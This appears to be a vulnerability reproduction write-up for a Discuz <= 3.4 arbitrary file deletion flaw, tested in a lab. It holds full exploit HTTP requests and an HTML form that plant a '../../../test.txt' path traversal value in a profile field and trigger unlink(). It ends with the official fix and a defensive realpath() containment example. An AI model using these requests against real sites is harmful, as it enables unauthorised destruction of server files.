Preface: On September 29, Discuz fixed a front-end arbitrary file deletion vulnerability. A similar vulnerability had been submitted to wooyun and the Discuz team in 2014, but the incomplete fix led to this one. Many posts online say the official 3.4 version has already been fixed, but the environment I used is the 3.4 version from vulhub, so not knowing whether 3.4 is fixed or not, I just reproduce it directly.

Affected versions: Discuz <= 3.4
Environment:

Reproduction: First create a test.txt file in the Discuz directory; it is the file that will be deleted later.

(Figure: create test.txt)

Visit http://192.168.220.131/home.php?mod=spacecp, then open the browser inspector, find the value of formhash and copy it.
(Figure: view formhash)

Use Burp to capture the request and obtain the cookie.

(Figure: capture the cookie)

Send the following request, replacing the cookie, the formhash and the file to be deleted:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
(Figure: send the request that stores the path)

Refresh the page; the birthplace field now shows the state in the figure below:

(Figure: data written successfully)

This confirms the value has been stored in the database.

Next, create an upload.html with the following code, changing the IP to the Discuz host and [form-hash] to your formhash:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="84a7f376" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>
Or construct the request directly:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 9198
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba (anything can go here)
-----------------------------123821742118716--
Go back to the Discuz directory and you can see that test.txt has been deleted.
Fix recommendation: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574

Edit the file upload/source/include/spacecp/spacecp_profile.php and remove the code related to unlink.
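The root cause shown above is that a profile field value stored from the first request is later handed to unlink() by the deletefile branch, so a value like ../../../test.txt escapes the upload directory. The official fix simply removes that unlink call. The following is an added example, not code from Discuz or from the original post, of the containment check a maintainer would apply if a stored path ever had to reach unlink(): the function name safe_unlink_upload and the throw-away directory layout are my own constructions.

```php
<?php
// Added example (not Discuz's own code): refuse to unlink anything that does
// not resolve to a regular file inside the configured upload directory.
declare(strict_types=1);

/**
 * Delete $storedPath only if it resolves to a regular file inside $uploadDir.
 * $storedPath is the value that came from the database (and therefore
 * originally from the user), e.g. "../../../test.txt" in the write-up.
 * Returns true when the file was deleted, false when the path was refused
 * or did not exist.
 */
function safe_unlink_upload(string $uploadDir, string $storedPath): bool
{
    $base = realpath($uploadDir);
    if ($base === false) {
        return false; // the upload directory itself does not exist
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // Empty values and embedded NUL bytes are never valid file names.
    if ($storedPath === '' || strpos($storedPath, "\0") !== false) {
        return false;
    }

    // realpath() collapses ".." segments and follows symlinks, so the check
    // below is made on the final on-disk location, not on the raw string.
    $target = realpath($base . $storedPath);
    if ($target === false || !is_file($target)) {
        return false;
    }

    // The resolved path must begin with the upload directory prefix.
    if (strncmp($target, $base, strlen($base)) !== 0) {
        return false;
    }

    return unlink($target);
}

// Demo on a constructed, throw-away directory tree:
//   $tmp/upload/avatar.jpg   legitimate attachment inside the upload dir
//   $tmp/test.txt            stand-in for the file the write-up deleted
$tmp = sys_get_temp_dir() . '/discuz_unlink_demo_' . bin2hex(random_bytes(4));
mkdir("$tmp/upload", 0700, true);
file_put_contents("$tmp/upload/avatar.jpg", 'jpg');
file_put_contents("$tmp/test.txt", 'keep me');

// A traversal value pointing one level above the upload directory.
var_dump(safe_unlink_upload("$tmp/upload", '../test.txt'));
var_dump(file_exists("$tmp/test.txt"));

// A plain file name inside the upload directory.
var_dump(safe_unlink_upload("$tmp/upload", 'avatar.jpg'));
var_dump(file_exists("$tmp/upload/avatar.jpg"));

// Remove the demo tree.
@unlink("$tmp/test.txt");
@unlink("$tmp/upload/avatar.jpg");
rmdir("$tmp/upload");
rmdir($tmp);
```

Run it with php on any system with a writable temp directory. The traversal call is refused and test.txt survives, while the in-directory call removes avatar.jpg. The important design point is that the comparison is done on realpath() output on both sides: checking the raw stored string for ".." would miss symlinks and encoded variants, and it is exactly the raw string that the vulnerable code trusted.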